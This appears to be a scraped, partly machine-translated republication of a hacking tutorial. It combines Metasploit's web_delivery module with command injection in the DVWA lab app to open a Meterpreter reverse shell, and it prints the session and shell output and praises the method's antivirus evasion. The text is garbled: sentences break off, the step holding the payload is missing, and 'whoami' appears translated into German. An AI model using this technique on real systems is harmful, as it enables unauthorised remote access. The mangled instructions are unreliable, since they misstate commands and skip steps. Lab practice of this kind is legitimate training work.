قالب وردپرس درنا توس
Home / Tips and Tricks / How to Use Metasploit's Web Delivery Script & Command Injection to Pop a Shell «Zero Byte :: WonderHowTo

How to Use Metasploit's Web Delivery Script & Command Injection to Pop a Shell «Zero Byte :: WonderHowTo



One of the best ways to improve your skills as a hacker is to learn different ways to attack success. What did it mean to do a good job?

Today, we want to use the Kali Linux and Metasploit to attack the vulnerable web application DVWA, as part of the Metasploitable 2 virtual machine.

Web Delivery Overview

server created on the attacking machine. The web delivery script is run once the target machine connects to the server and the payload is then executed. Python, Powershell, and PHP applications.

The web delivery scripts primary advantage is stealth. The server and payload are both hosted on the attacking machine, so when the exploit is carried out, there is nothing written to disc on the target, making it less likely to trigger antivirus applications and other defenses.

The one caveat of this Command injection primer

Command injection is a type of attack in which arbitrary operating system commands are executed on the host via a vulnerable web application. Usually, this occurs when an application passes unsafe user input from a form to the server, but this can happen with cookies, HTTP headers, and other sources of data.

This type of vulnerability is especially dangerous because of the intrinsic power of system commands.

Step 1: Fire Up DVWA

The first thing we need to do is open DVWA and log in using the default credentials.

Next, browse to the "DVWA Security" tab and set the security level to "low" to make sure our exploit is run

Step 2: Find a Vulnerable Entry Point

Now we can navigate to the "Command Execution" page. For this attack to work, we have to ensure that the target application can communicate with our local machine. We can take advantage of the default functionality of this page to ping our attacking machine.

After receiving a successful reply, the next thing we need to do is determine if this page is vulnerable to command injection. We can do so by appending to an IP address. Here, we want to add the ls && symbol and hit "submit" again.

Step 4: Run the Attack

We can use the command vulnerability that we discovered earlier as an easy means of attacking. To copy the last line and appendix to the IP address with && in the "Command Execution" page of DVWA, just like the page was vulnerable in the first place.

If everything goes according to plan, once we hit "submit," our payload wants to be executed and a meterpreter session will be opened. Back in the terminal, we can see that this is exactly what happens.

 msf exploit (multi / script / web_delivery)> [*] 172.16.1.102 web_delivery - Delivering Payload
[*] Sending stage (37775 bytes) to 172.16.1.102
[*] Meterpreter session 1 opened (172.16.1.100:1234 -> 172.16.1.102:57343) at 2018-10-22 11:12:05 -0500 

We are not automatically in the session, though, so we can sessions command to view the active sessions that are open.

 msf exploit (multi / script / web_delivery)> sessions

Active sessions
===============

  Id Name Type Information Connection
  - ---- ---- ----------- ----------
  1 meterpreter php / linux www-data (33) @ metasploitable 172.16.1.100:1234 -> 172.16.1.102:57343 (172.16.1.102) 

To interact with an active session, use the sessions -i command followed by the appropriate session ID number.

 msf exploit (multi / script / web_delivery)> sessions -i 1
[*] Starting interaction with 1 ...

meterpreter> getuid
Server username: www-data (33)
meterpreter> sysinfo
Computer: metasploitable
OS: Linux metasploitable 2.6.24-16-server # 1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
Meterpreter: php / linux 

Now we can run Meterpreter commands like getuid and sysinfo to display information about the target machine. We can drop into a shell by using the shell command.

 meterpreter> shell
Process 4869 created.
Channel 0 created.
wer bin ich
www-data
uname -a
Linux metasploitable 2.6.24-16-server # 1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU / Linux
ps
  PID TTY TIME CMD
 4656? 00:00:00 apache2
 4658? 00:00:00 apache2
 4661? 00:00:00 apache2
 4663? 00:00:00 apache2
 4665? 00:00:00 apache2
 4761? 00:00:00 apache2
 4793? 00:00:00 apache2
 4855? 00:00:00 php
 4856? 00:00:00 sh
 4858? 00:00:00 php
 4869? 00:00:00 sh
 4873? 00:00:00 ps 

From here, we can issue commands like whoami to view the current user, uname -a to display operating system information, and ps to see a list of running processes. Wrapping Up

In this tutorial, we learned a bit about command injection, Metasploit's web delivery script, and how to combine the two into an effective method of attack. In this case, the chances of success in evading antivirus solutions are increasing.


Source link